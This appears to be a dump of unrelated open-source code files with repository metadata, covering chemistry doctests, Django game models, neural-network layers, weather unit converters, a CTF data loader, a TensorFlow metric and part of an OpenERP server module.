>>> tpl = extractLayers('InChI=1/C9H12ClFN2O2/c10-7(11)3-1-2-6(4-8(12)14)5-9(13)15/h1-3,7H,4-5H2,(H2,12,14)(H2,13,15)/b3-1+/t7-/m0/s1/f/h12,14H,13H2/b3-1+,6-2-,12-8?')
>>> tpl.fixedh
'f/h12,14H,13H2'
>>> tpl.fixedh_stereo_bond
'b3-1+,6-2-,12-8?'
Fixed Hs causes stereo
From: C[C@H](Cl)[C@H](/CC(O)=N)CC(=O)N
>>> tpl = extractLayers('InChI=1/C7H13ClN2O2/c1-4(8)5(2-6(9)11)3-7(10)12/h4-5H,2-3H2,1H3,(H2,9,11)(H2,10,12)/t4-/m0/s1/f/h9,11H,10H2/t4-,5+')
>>> tpl.fixedh
'f/h9,11H,10H2'
>>> tpl.fixedh_stereo_tet
't4-,5+'
Fixed Hs cause a new formula
From: C[C@H](CCC[C@@H](SCCC(C)(C)O)c1cccc(\C=C\c2ccc3ccc(Cl)cc3n2)c1)C(=O)[O-] # from ChEMBL
>>> tpl = extractLayers('InChI=1/C29H34ClNO3S/c1-20(28(32)33)6-4-9-27(35-17-16-29(2,3)34)23-8-5-7-21(18-23)10-14-25-15-12-22-11-13-24(30)19-26(22)31-25/h5,7-8,10-15,18-20,27,34H,4,6,9,16-17H2,1-3H3,(H,32,33)/p-1/b14-10+/t20-,27-/m1/s1/fC29H33ClNO3S/q-1')
>>> tpl.formula
'C29H34ClNO3S'
>>> tpl.fixedh
'fC29H33ClNO3S'
>>> tpl.fixedh_charge
'q-1'
Disconnected parts + Fixed Hs causes stereo_bond + isotopes cause stereo
From: [13CH3][C@H](C)O[C@H](C)O.F[C@H](Cl)/C=C/C=C(/CC(O)=N)CC(=O)N
>>> tpl = extractLayers('InChI=1/C9H12ClFN2O2.C5H12O2/c10-7(11)3-1-2-6(4-8(12)14)5-9(13)15;1-4(2)7-5(3)6/h1-3,7H,4-5H2,(H2,12,14)(H2,13,15);4-6H,1-3H3/b3-1+;/t7-;5-/m01/s1/i;1+1/t;4-,5-/f/h12,14H,13H2;/b3-1+,6-2-,12-8?;')
>>> tpl.stereo_bond
'b3-1+;'
>>> tpl.isotope
'i;1+1'
>>> tpl.isotope_stereo_tet
't;4-,5-'
>>> tpl.fixedh_stereo_bond
'b3-1+,6-2-,12-8?;'
Fixed Hs causes stereo + (FixedHs + isotopes) causes stereo (this is the most dependent example I can think of)
From: N=C(NC)C(/C(=NC)N)=C/CC/C=C(/C1=NC=C[15NH]1)C1NC=C[15N]=1
>>> tpl = extractLayers('InChI=1/C16H22N8/c1-19-13(17)11(14(18)20-2)5-3-4-6-12(15-21-7-8-22-15)16-23-9-10-24-16/h5-10H,3-4H2,1-2H3,(H2,17,19)(H2,18,20)(H,21,22)(H,23,24)/i21+1,23+1/f/h17,19,21,23H,18H2/b11-5-,17-13?,20-14?/i21+1,24+1/b11-5-,12-6-,17-13?,20-14?')
>>> tpl.isotope
'i21+1,23+1'
>>> tpl.isotope_ster
|
alimon/oeqa2
|
oeqa2/test/decorator/__init__.py
|
Python
|
mit
| 1,356
| 0.007375
|
# Copyright (C) 2016 Intel Corporation
# Released under the MIT license (see COPYING.MIT)
from functools import wraps
class OETestDecorator(object):
case = None # Reference of OETestCase decorated
attrs = None # Attributes to be loaded by decorator implementation
    def __init__(self, *args, **kwargs):
if not self.attrs:
return
for idx, attr in enumerate(self.attrs):
attr_type = self.attrs[attr]
if attr in kwargs:
value = kwargs[attr]
else:
value = args[idx]
value_type = type(value)
            if not value_type == attr_type:
class_name = self.__class__.__name__
raise TypeError("%s decorator attr %s expects argument %s"\
" received %s." % (class_name, attr, attr_type,
value_type))
setattr(self, attr, value)
def __call__(self, func):
@wraps(func)
def wrapped_f(*args, **kwargs):
self.attrs = self.attrs # XXX: Enables OETestLoader discover
return func(*args, **kwargs)
return wrapped_f
def bind(self, case):
self.case = case
self.case.decorators.append(self)
def setUp(self):
pass
from .depends import OETestDepends
from .oeid import OETestID
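# --- Illustrative sketch (not part of the original module) ---
# A minimal concrete decorator built on OETestDecorator, showing how the
# `attrs` mapping drives argument validation in __init__. The attribute name
# "depends_on" and the decorated function are invented for illustration only.
class OEExampleTag(OETestDecorator):
    attrs = {'depends_on': str}

@OEExampleTag(depends_on='test_boot')
def _example_case():
    return True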
|
djrscally/eve-wspace
|
evewspace/POS/models.py
|
Python
|
gpl-3.0
| 7,280
| 0.003846
|
# Eve W-Space
# Copyright (C) 2013 Andrew Austin and other contributors
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version. An additional term under section
# 7 of the GPL is included in the LICENSE file.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.db import models
from core.models import Type, Location
from API.models import CorpAPIKey
from core.models import Corporation, Alliance
from Map.models import System
import csv
from django.contrib.auth.models import User
import pytz
class POS(models.Model):
"""Represents a POS somewhere in space."""
system = models.ForeignKey(System, related_name="poses")
planet = models.IntegerField()
moon = models.IntegerField()
towertype = models.ForeignKey(Type, related_name="inspace")
corporation = models.ForeignKey(Corporation, related_name="poses")
posname = models.CharField(max_length=100, blank=True, null=True)
fitting = models.TextField(blank=True, null=True)
#Using CCP's status codes here for sanity with API checks
status = models.IntegerField(choices = ((0, 'Unanchored'), (1, 'Anchored'),
(2, 'Onlining'), (3, 'Reinforced'), (4, 'Online')))
#This should be the time the tower exits RF
#TODO: add a validator to make sure this is only set if status = 3 (Reinforced)
rftime = models.DateTimeField(null=True, blank=True)
updated = models.DateTimeField()
# These values will be set by the TSV parser from d-scan data if available
guns = models.IntegerField(null=True, blank=True)
ewar = models.IntegerField(null=True, blank=True)
sma = models.IntegerField(null=True, blank=True)
hardener = models.IntegerField(null=True, blank=True)
# This is a short comment that is displayed as a warning
warpin_notice = models.CharField(blank=True, null=True, max_length=64)
class Meta:
ordering = ['system__name', 'planet', 'moon']
def clean(self):
from django.core.exceptions import ValidationError
if self.rftime and self.status != 3:
raise ValidationError("A POS cannot have an rftime unless it is reinforced")
def __unicode__(self):
return self.posname
    #override save to implement posname defaulting to towertype.name
def save(self, *args, **kwargs):
if not self.posname:
self.posname = self.towertype.name
# Ensure that any newline characters in fitting are changed to <br>
self.fitting = self.fitting.replace("\n", "<br />")
# Mark tower as having been updated
from datetime import datetime
import pytz
self.updated = datetime.now(pytz.utc)
super(POS, self).save(*args, **kwargs)
def size(self):
"""
Returns the size of the tower, Small Medium or Large.
"""
if u'Small' in self.towertype.name:
return u'Small'
if u'Medium' in self.towertype.name:
return u'Medium'
return u'Large'
def fit_from_dscan(self, dscan):
"""
Fills in a POS's fitting from a copy / paste of d-scan results.
"""
import csv
from core.models import Type
itemDict={}
# marketGroupIDs to consider guns, ewar, hardeners, and smas
gunsGroups = [480, 479, 594, 595, 596]
ewarGroups = [481, 1009]
smaGroups = [484,]
hardenerGroups = [485,]
towers = 0
self.sma = 0
self.hardener = 0
self.guns = 0
self.ewar = 0
for row in csv.reader(dscan.splitlines(), delimiter="\t"):
itemType = Type.objects.get(name=row[1])
if itemType.marketgroup:
groupTree = []
parent = itemType.marketgroup
while parent:
groupTree.append(parent.id)
parent = parent.parentgroup
if itemType.marketgroup.id in gunsGroups:
self.guns += 1
if itemType.marketgroup.id in ewarGroups:
self.ewar += 1
if itemType.marketgroup.id in smaGroups:
self.sma += 1
if itemType.marketgroup.id in hardenerGroups:
self.hardener += 1
if itemType.marketgroup.id == 478:
towers += 1
if itemDict.has_key(itemType.name):
itemDict[itemType.name] += 1
elif 1285 in groupTree and 478 not in groupTree:
itemDict.update({itemType.name: 1})
self.fitting = "Imported from D-Scan:\n"
for itemtype in itemDict:
self.fitting += "\n%s : %s" % (itemtype, itemDict[itemtype])
if towers <= 1:
self.save()
else:
raise AttributeError('Too many towers detected in the D-Scan!')
class CorpPOS(POS):
"""A corp-controlled POS with manager and password data."""
manager = models.ForeignKey(User, null=True, blank=True, related_name='poses')
password = models.CharField(max_length=100)
description = models.TextField(null=True, blank=True)
#Let's store the CCP Item ID for the tower here to make API lookup easier
#If it is null, then we are not tracking this POS via API
apiitemid = models.BigIntegerField(null=True, blank=True)
apikey = models.ForeignKey(CorpAPIKey, null=True, blank=True, related_name='poses')
class Meta:
permissions = (('can_see_pos_pw', 'Can see corp POS passwords.'),
('can_see_all_pos', 'Sees all corp POSes regardless of manager.'),)
class POSApplication(models.Model):
"""Represents an application for a personal POS."""
applicant = models.ForeignKey(User, null=True, blank=True, related_name='posapps')
towertype = models.ForeignKey(Type, null=True, blank=True, related_name='posapps')
residents = models.ManyToManyField(User)
normalfit = models.TextField()
siegefit = models.TextField()
#Once it is approved, we will fill in these two to tie the records together
approved = models.DateTimeField(blank=True, null=True)
posrecord = models.ForeignKey(CorpPOS, blank=True, null=True, related_name='application')
class Meta:
permissions = (('can_close_pos_app', 'Can dispose of corp POS applications.'),)
def __unicode__(self):
return 'Applicant: %s Tower: %s' % (self.applicant.username, self.towertype.name)
class POSVote(models.Model):
"""Represents a vote on a personal POS application."""
application = models.ForeignKey(POSApplication, related_name='votes')
voter = models.ForeignKey(User, related_name='posvotes')
vote = models.IntegerField(choices=((0,'Deny'), (1, 'Approve'), (2, 'Abstain')))
|
mrcslws/nupic.research
|
packages/backprop_structure/src/nupic/research/frameworks/backprop_structure/networks/alexnet_kwinners.py
|
Python
|
agpl-3.0
| 5,250
| 0
|
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2019, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
from collections import OrderedDict
from functools import partial
from torch import nn
from nupic.research.frameworks.pytorch.modules import KWinners2dLocal
from nupic.torch.modules import Flatten, KWinners, KWinners2d
__all__ = [
"AlexNetKWinners",
"gsc_alexnet_kwinners",
]
class AlexNetKWinners(nn.Sequential):
def __init__(self,
input_size,
num_classes,
cnn_out_channels=(64, 64),
cnn_activity_percent_on=(0.095, 0.125),
linear_units=1000,
linear_activity_percent_on=(0.1,),
kernel_size=5,
maxpool_stride=2,
boost_strength=1.5,
boost_strength_factor=0.9,
duty_cycle_period=1000,
k_inference_factor=1.0,
use_kwinners_local=False):
feature_map_sidelength = (
(((input_size[1] - kernel_size + 1) / maxpool_stride)
- kernel_size + 1) / maxpool_stride
)
assert(feature_map_sidelength == int(feature_map_sidelength))
feature_map_sidelength = int(feature_map_sidelength)
kwinner2d_class = KWinners2dLocal if use_kwinners_local else KWinners2d
super().__init__(OrderedDict([
# -------------
# Conv Block
# -------------
("cnn1", nn.Conv2d(input_size[0],
cnn_out_channels[0],
kernel_size)),
("cnn1_maxpool", nn.MaxPool2d(maxpool_stride)),
("cnn1_bn", nn.BatchNorm2d(cnn_out_channels[0],
affine=False)),
("cnn1_kwinner", kwinner2d_class(
channels=cnn_out_channels[0],
percent_on=cnn_activity_percent_on[0],
k_inference_factor=k_inference_factor,
boost_strength=boost_strength,
boost_strength_factor=boost_strength_factor,
duty_cycle_period=duty_cycle_period,
)),
# -------------
# Conv Block
# -------------
("cnn2", nn.Conv2d(cnn_out_channels[0],
cnn_out_channels[1],
kernel_size)),
("cnn2_maxpool", nn.MaxPool2d(maxpool_stride)),
("cnn2_bn", nn.BatchNorm2d(cnn_out_channels[1],
affine=False)),
("cnn2_kwinner", kwinner2d_class(
channels=cnn_out_channels[1],
percent_on=cnn_activity_percent_on[1],
k_inference_factor=k_inference_factor,
boost_strength=boost_strength,
boost_strength_factor=boost_strength_factor,
duty_cycle_period=duty_cycle_period,
)),
("flatten", Flatten()),
# -------------
# Linear Block
# -------------
("fc1", nn.Linear(
(feature_map_sidelength**2) * cnn_out_channels[1],
linear_units)),
("fc1_bn", nn.BatchNorm1d(linear_units, affine=False)),
("fc1_kwinner", KWinners(
n=linear_units,
percent_on=linear_activity_percent_on[0],
k_inference_factor=k_inference_factor,
boost_strength=boost_strength,
boost_strength_factor=boost_strength_factor,
duty_cycle_period=duty_cycle_period,
)),
("fc1_dropout", nn.Dropout(0.5)),
# -------------
# Output Layer
# -------------
("fc2", nn.Linear(linear_units,
num_classes)),
]))
gsc_alexnet_kwinners = partial(AlexNetKWinners,
input_size=(1, 32, 32),
num_classes=12,
cnn_activity_percent_on=(0.095, 0.125),
linear_activity_percent_on=(0.1,),
boost_strength=1.5,
boost_strength_factor=0.9,
duty_cycle_period=1000,
k_inference_factor=1.0)
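# --- Illustrative sketch (not part of the original file) ---
# Constructing the GSC variant defined above and pushing a dummy batch through
# it; shapes follow input_size=(1, 32, 32) and the 12 output classes. Kept as
# comments so importing this module stays side-effect free.
#
#   import torch
#   model = gsc_alexnet_kwinners()
#   scores = model(torch.randn(8, 1, 32, 32))   # -> shape (8, 12)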
|
vlas-sokolov/pyspeckit
|
pyspeckit/spectrum/models/astropy_models.py
|
Python
|
mit
| 1,575
| 0.008889
|
try:
from astropy.models import ParametricModel,Parameter,_convert_input,_convert_output
import numpy as np
class PowerLawModel(ParametricModel):
param_names = ['scale', 'alpha']
def __init__(self, scale, alpha, param_dim=1):
self._scale = Parameter(name='scale', val=scale, mclass=self, param_dim=param_dim)
self._alpha = Parameter(name='alpha', val=alpha, mclass=self, param_dim=param_dim)
super(ParametricModel,self).__init__(self, self.param_names, ndim=1, outdim=1, param_dim=param_dim)
self.linear = False
self.deriv = None
def eval(self, xvals, params):
            return params[0]*((xvals)**(-params[1]))
def noderiv(self, params, xvals, yvals):
deriv_dict = {
'scale': ((xvals)**(-params[1])),
                'alpha': params[0]*((xvals)**(-params[1]))*np.log(xvals)}
derivval = [deriv_dict[par] for par in self.param_names]
return np.array(derivval).T
def __call__(self, x):
"""
Transforms data using this model.
Parameters
--------------
x : array, of minimum dimensions 1
Notes
-----
See the module docstring for rules for model evaluation.
"""
x, fmt = _convert_input(x, self.param_dim)
result = self.eval(x, self.param_sets)
return _convert_output(result, fmt)
except ImportError:
pass
|
csparpa/pyowm
|
pyowm/utils/measurables.py
|
Python
|
mit
| 7,259
| 0.000276
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Temperature conversion constants
KELVIN_OFFSET = 273.15
FAHRENHEIT_OFFSET = 32.0
FAHRENHEIT_DEGREE_SCALE = 1.8
# Wind speed conversion constants
MILES_PER_HOUR_FOR_ONE_METER_PER_SEC = 2.23694
KM_PER_HOUR_FOR_ONE_METER_PER_SEC = 3.6
KNOTS_FOR_ONE_METER_PER_SEC = 1.94384
# Barometric conversion constants
HPA_FOR_ONE_INHG = 33.8639
# Visibility distance conversion constants
MILE_FOR_ONE_METER = 0.000621371
KMS_FOR_ONE_METER = .001
# Decimal precision
ROUNDED_TO = 2
def kelvin_dict_to(d, target_temperature_unit):
"""
Converts all the values in a dict from Kelvin temperatures to the
specified temperature format.
:param d: the dictionary containing Kelvin temperature values
:type d: dict
:param target_temperature_unit: the target temperature unit, may be:
'celsius' or 'fahrenheit'
:type target_temperature_unit: str
:returns: a dict with the same keys as the input dict and converted
temperature values as values
:raises: *ValueError* when unknown target temperature units are provided
"""
if target_temperature_unit == 'kelvin':
return d
elif target_temperature_unit == 'celsius':
return {key: kelvin_to_celsius(d[key]) for key in d}
elif target_temperature_unit == 'fahrenheit':
return {key: kelvin_to_fahrenheit(d[key]) for key in d}
else:
raise ValueError("Invalid value for target temperature conversion \
unit")
def kelvin_to_celsius(kelvintemp):
"""
Converts a numeric temperature from Kelvin degrees to Celsius degrees
:param kelvintemp: the Kelvin temperature
:type kelvintemp: int/long/float
:returns: the float Celsius temperature
:raises: *TypeError* when bad argument types are provided
"""
if kelvintemp < 0:
raise ValueError(__name__ +
": negative temperature values not allowed")
celsiustemp = kelvintemp - KELVIN_OFFSET
return float("{0:.2f}".format(celsiustemp))
def kelvin_to_fahrenheit(kelvintemp):
"""
Converts a numeric temperature from Kelvin degrees to Fahrenheit degrees
:param kelvintemp: the Kelvin temperature
:type kelvintemp: int/long/float
:returns: the float Fahrenheit temperature
:raises: *TypeError* when bad argument types are provided
"""
if kelvintemp < 0:
raise ValueError(__name__ +
": negative temperature values not allowed")
fahrenheittemp = (kelvintemp - KELVIN_OFFSET) * \
FAHRENHEIT_DEGREE_SCALE + FAHRENHEIT_OFFSET
return float("{0:.2f}".format(fahrenheittemp))
def metric_wind_dict_to_imperial(d):
"""
Converts all the wind values in a dict from meters/sec (metric measurement
system) to miles/hour (imperial measurement system)
.
:param d: the dictionary containing metric values
:type d: dict
:returns: a dict with the same keys as the input dict and values converted
to miles/hour
"""
result = {}
for key, value in d.items():
if key != 'deg': # do not convert wind degree
result[key] = value * MILES_PER_HOUR_FOR_ONE_METER_PER_SEC
else:
result[key] = value
return result
def metric_wind_dict_to_km_h(d):
"""
Converts all the wind values in a dict from meters/sec
to km/hour.
:param d: the dictionary containing metric values
:type d: dict
:returns: a dict with the same keys as the input dict and values converted
to km/hour
"""
result = {}
for key, value in d.items():
        if key != 'deg': # do not convert wind degree
            result[key] = value * KM_PER_HOUR_FOR_ONE_METER_PER_SEC
else:
result[key] = value
return result
def metric_wind_dict_to_knots(d):
"""
Converts all the wind values in a dict from meters/sec
to knots
:param d: the dictionary containing metric values
:type d: dict
:returns: a dict with the same keys as the input dict and values converted
        to knots
"""
result = {}
for key, value in d.items():
if key != 'deg': # do not convert wind degree
result[key] = value * KNOTS_FOR_ONE_METER_PER_SEC
else:
result[key] = value
return result
def metric_wind_dict_to_beaufort(d):
"""
Converts all the wind values in a dict from meters/sec
to the corresponding Beaufort scale level (which is not an exact number but rather
represents a range of wind speeds - see: https://en.wikipedia.org/wiki/Beaufort_scale).
Conversion table: https://www.windfinder.com/wind/windspeed.htm
:param d: the dictionary containing metric values
:type d: dict
:returns: a dict with the same keys as the input dict and values converted
to Beaufort level
"""
result = {}
for key, value in d.items():
if key != 'deg': # do not convert wind degree
if value <= 0.2:
bf = 0
elif 0.2 < value <= 1.5:
bf = 1
elif 1.5 < value <= 3.3:
bf = 2
elif 3.3 < value <= 5.4:
bf = 3
elif 5.4 < value <= 7.9:
bf = 4
elif 7.9 < value <= 10.7:
bf = 5
elif 10.7 < value <= 13.8:
bf = 6
elif 13.8 < value <= 17.1:
bf = 7
elif 17.1 < value <= 20.7:
bf = 8
elif 20.7 < value <= 24.4:
bf = 9
elif 24.4 < value <= 28.4:
bf = 10
elif 28.4 < value <= 32.6:
bf = 11
else:
bf = 12
result[key] = bf
else:
result[key] = value
return result
def metric_pressure_dict_to_inhg(d):
"""
Converts all barometric pressure values in a dict to "inches of mercury."
:param d: the dictionary containing metric values
:type d: dict
:returns: a dict with the same keys as the input dict and values converted
to "Hg or inHg (inches of mercury)
Note what OWM says about pressure: "Atmospheric pressure [is given in hPa]
(on the sea level, if there is no sea_level or grnd_level data)"
"""
result = dict()
for key, value in d.items():
if value is None:
continue
result[key] = round((value / HPA_FOR_ONE_INHG), ROUNDED_TO)
return result
def visibility_distance_to(v, target_visibility_unit='kilometers'):
"""
Converts visibility distance (in meters) to kilometers or miles
Defaults to kilometer conversion
    :param v: the value of visibility_distance
    :type v: int
:param target_visibility_unit: the unit of conversion
:type target_visibility_unit: str
:returns: a converted value for visibility_distance (float)
"""
if v is None:
return v
if target_visibility_unit == 'kilometers':
const = KMS_FOR_ONE_METER
elif target_visibility_unit == 'miles':
const = MILE_FOR_ONE_METER
else:
raise ValueError('Invalid value for target visibility distance unit')
return round(v * const, ROUNDED_TO)
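# --- Illustrative usage sketch (not part of the original module) ---
# The input values below are made up; they only exercise the converters
# defined above.
if __name__ == '__main__':
    temps_kelvin = {'temp': 293.15, 'temp_min': 290.0, 'temp_max': 295.5}
    print(kelvin_dict_to(temps_kelvin, 'celsius'))    # {'temp': 20.0, ...}
    wind_metric = {'speed': 9.0, 'gust': 12.5, 'deg': 187}
    print(metric_wind_dict_to_beaufort(wind_metric))  # 'deg' is left untouched
    print(visibility_distance_to(10000, 'miles'))     # ~6.21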
|
aaronsw/watchdog
|
import/parse/punch.py
|
Python
|
agpl-3.0
| 1,090
| 0.008257
|
from decimal import Decimal
import re
import web
r_row = re.compile(r'<tr>(.*?)</tr>', re.S)
r_td = re.compile(r'<td v[^>]+>([^<]*)</td>')
r_member = re.compile(r'member=([^"]+)">([^<]+)<')
def fixdec(d):
d = d.strip()
return Decimal(d) and Decimal(d)/100
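# Illustrative note (added, not in the original): fixdec() strips whitespace
# and divides by 100, e.g. fixdec(' 150 ') -> Decimal('1.5'); a zero value
# short-circuits the `and` and stays 0.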
def parse_doc(d):
for row in r_row.findall(d):
out = r_td.findall(row)
if out:
dist, membername = r_member.findall(row)[0]
dist = dist.replace('At Large', '00')
dist = dist[:2] + '-' + dist[2:].zfill(2)
s = web.storage()
s.district = dist
s.progressive2008 = fixdec(out[0])
            s.chips2008 = fixdec(out[1])
s.progressiveall = fixdec(out[3])
s.name = membername.decode('iso-8859-1')
yield s
def parse_all():
d = file('../data/crawl/punch/house.html').read()
for x in parse_doc(d): yield x
d = file('../data/crawl/punch/senate.html').read()
for x in parse_doc(d): yield x
if __name__ == "__main__":
import tools
tools.export(parse_all())
|
galaxy-ctf/milky-way
|
milkyway/management/commands/load_chals.py
|
Python
|
agpl-3.0
| 1,410
| 0
|
from django.core.management.base import BaseCommand
from milkyway.models import Challenge, Hint, Category, Flag
import yaml
class Command(BaseCommand):
help = 'Load data from yaml file'
def add_arguments(self, parser):
parser.add_argument('dataset', type=str)
def handle(self, *args, **options):
with open(options['dataset'], 'r') as handle:
data = yaml.load(handle)
Category.objects.all().delete()
for cat in data['chals']:
            category = Category.objects.create(
name=cat['name'],
description=cat['desc']
)
for chal in cat['chals']:
chal_data = {
'id': chal['id'],
                    'name': chal['name'],
'description': chal['desc'],
'value': chal['value'],
'category': category,
'lesson': chal.get('lesson', ''),
}
c = Challenge.objects.create(**chal_data)
for hint in chal['hints']:
Hint.objects.create(text=hint, chal=c, show=False)
c.save()
for flag in chal['flags']:
Flag.objects.create(
chal=c,
flag=flag['flag'],
flag_is_regex=flag['regex'],
)
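# --- Illustrative sketch (not part of the original command) ---
# The YAML shape that handle() above expects, with field names inferred from
# the keys it reads; the challenge data itself is invented for illustration.
EXAMPLE_DATASET = """
chals:
  - name: Web
    desc: Web challenges
    chals:
      - id: 1
        name: baby-web
        desc: Find the flag hidden in the page source.
        value: 100
        lesson: View-source is your friend.
        hints:
          - Check the HTML comments.
        flags:
          - flag: "flag{example}"
            regex: false
"""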
|
HaebinShin/tensorflow
|
tensorflow/contrib/metrics/python/metrics/classification.py
|
Python
|
apache-2.0
| 2,307
| 0.002167
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Classification metrics library."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import math_ops
# TODO(nsilberman): move into metrics/python/ops/
def accuracy(predictions, labels, weights=None):
"""Computes the percentage of times that predictions matches labels.
Args:
predictions: the predicted values, a `Tensor` whose dtype and shape
matches 'labels'.
labels: the ground truth values, a `Tensor` of any shape and
integer or string dtype.
weights: None or `Tensor` of float values to reweight the accuracy.
Returns:
Accuracy `Tensor`.
Raises:
ValueError: if dtypes don't match or
if dtype is not integer or string.
"""
if not (labels.dtype.is_integer or labels.dtype == dtypes.string):
    raise ValueError('Labels should have integer or string dtype. '
                     'Given: %s' % str(labels.dtype))
if not labels.dtype.is_compatible_with(predictions.dtype):
raise ValueError('Dtypes of predictions and labels should match. '
'Given: predictions (%s) and labels (%s)' %
(str(predictions.dtype), str(labels.dtype)))
with ops.op_scope([predictions, labels], 'accuracy'):
is_correct = math_ops.cast(
math_ops.equal(predictions, labels), dtypes.float32)
if weights is not None:
is_correct = math_ops.mul(is_correct, weights)
return math_ops.reduce_mean(is_correct)
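# --- Illustrative sketch (not part of the original file; assumes the TF1-era
# graph/session API) ---
#   import tensorflow as tf
#   acc = accuracy(predictions=tf.constant([1, 0, 1]), labels=tf.constant([1, 1, 1]))
#   with tf.Session() as sess:
#       print(sess.run(acc))   # ~0.6667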
|
trabacus-softapps/openerp-8.0-cc
|
openerp/service/server.py
|
Python
|
agpl-3.0
| 32,015
| 0.003155
|
#-----------------------------------------------------------
# Threaded, Gevent and Prefork Servers
#-----------------------------------------------------------
import datetime
import errno
import logging
import os
import os.path
import platform
import psutil
import random
import resource
import select
import signal
import socket
import subprocess
import sys
import threading
import time
import werkzeug.serving
try:
import fcntl
except ImportError:
pass
try:
from setproctitle import setproctitle
except ImportError:
setproctitle = lambda x: None
import openerp
import openerp.tools.config as config
from openerp.release import nt_service_name
from openerp.tools.misc import stripped_sys_argv, dumpstacks
import wsgi_server
_logger = logging.getLogger(__name__)
SLEEP_INTERVAL = 60 # 1 min
def memory_info(process):
""" psutil < 2.0 does not have memory_info, >= 3.0 does not have
get_memory_info """
pmem = (getattr(process, 'memory_info', None) or process.get_memory_info)()
return (pmem.rss, pmem.vms)
#----------------------------------------------------------
# Werkzeug WSGI servers patched
#----------------------------------------------------------
class BaseWSGIServerNoBind(werkzeug.serving.BaseWSGIServer):
""" werkzeug Base WSGI Server patched to skip socket binding. PreforkServer
use this class, sets the socket and calls the process_request() manually
"""
def __init__(self, app):
werkzeug.serving.BaseWSGIServer.__init__(self, "1", "1", app)
def server_bind(self):
        # we don't bind because we use the listen socket of PreforkServer#socket
# instead we close the socket
if self.socket:
self.socket.close()
def server_activate(self):
# dont listen as we use PreforkServer#socket
pass
# _reexec() should set LISTEN_* to avoid connection refused during reload time. It
# should also work with systemd socket activation. This is currently untested
# and not yet used.
class ThreadedWSGIServerReloadable(werkzeug.serving.ThreadedWSGIServer):
""" werkzeug Threaded WSGI Server patched to allow reusing a listen socket
given by the environement, this is used by autoreload to keep the listen
socket open when a reload happens.
"""
def server_bind(self):
envfd = os.environ.get('LISTEN_FDS')
if envfd and os.environ.get('LISTEN_PID') == str(os.getpid()):
self.reload_socket = True
self.socket = socket.fromfd(int(envfd), socket.AF_INET, socket.SOCK_STREAM)
# should we os.close(int(envfd)) ? it seem python duplicate the fd.
else:
self.reload_socket = False
super(ThreadedWSGIServerReloadable, self).server_bind()
def server_activate(self):
if not self.reload_socket:
super(ThreadedWSGIServerReloadable, self).server_activate()
#----------------------------------------------------------
# AutoReload watcher
#----------------------------------------------------------
class AutoReload(object):
def __init__(self, server):
self.server = server
self.files = {}
self.modules = {}
import pyinotify
class EventHandler(pyinotify.ProcessEvent):
def __init__(self, autoreload):
self.autoreload = autoreload
def process_IN_CREATE(self, event):
_logger.debug('File created: %s', event.pathname)
self.autoreload.files[event.pathname] = 1
def process_IN_MODIFY(self, event):
_logger.debug('File modified: %s', event.pathname)
self.autoreload.files[event.pathname] = 1
self.wm = pyinotify.WatchManager()
self.handler = EventHandler(self)
        self.notifier = pyinotify.Notifier(self.wm, self.handler, timeout=0)
mask = pyinotify.IN_MODIFY | pyinotify.IN_CREATE # IN_MOVED_FROM, IN_MOVED_TO ?
for path in openerp.tools.config.options["addons_path"].split(','):
            _logger.info('Watching addons folder %s', path)
self.wm.add_watch(path, mask, rec=True)
def process_data(self, files):
xml_files = [i for i in files if i.endswith('.xml')]
addons_path = openerp.tools.config.options["addons_path"].split(',')
for i in xml_files:
for path in addons_path:
if i.startswith(path):
                    # find out which addons path the file belongs to
                    # and extract its module name
right = i[len(path) + 1:].split('/')
if len(right) < 2:
continue
module = right[0]
self.modules[module]=1
if self.modules:
_logger.info('autoreload: xml change detected, autoreload activated')
restart()
def process_python(self, files):
# process python changes
py_files = [i for i in files if i.endswith('.py')]
py_errors = []
# TODO keep python errors until they are ok
if py_files:
for i in py_files:
try:
source = open(i, 'rb').read() + '\n'
compile(source, i, 'exec')
except SyntaxError:
py_errors.append(i)
if py_errors:
_logger.info('autoreload: python code change detected, errors found')
for i in py_errors:
_logger.info('autoreload: SyntaxError %s',i)
else:
_logger.info('autoreload: python code updated, autoreload activated')
restart()
def check_thread(self):
# Check if some files have been touched in the addons path.
# If true, check if the touched file belongs to an installed module
# in any of the database used in the registry manager.
while 1:
while self.notifier.check_events(1000):
self.notifier.read_events()
self.notifier.process_events()
l = self.files.keys()
self.files.clear()
self.process_data(l)
self.process_python(l)
def run(self):
t = threading.Thread(target=self.check_thread)
t.setDaemon(True)
t.start()
_logger.info('AutoReload watcher running')
#----------------------------------------------------------
# Servers: Threaded, Gevented and Prefork
#----------------------------------------------------------
class CommonServer(object):
def __init__(self, app):
# TODO Change the xmlrpc_* options to http_*
self.app = app
# config
self.interface = config['xmlrpc_interface'] or '0.0.0.0'
self.port = config['xmlrpc_port']
# runtime
self.pid = os.getpid()
def close_socket(self, sock):
""" Closes a socket instance cleanly
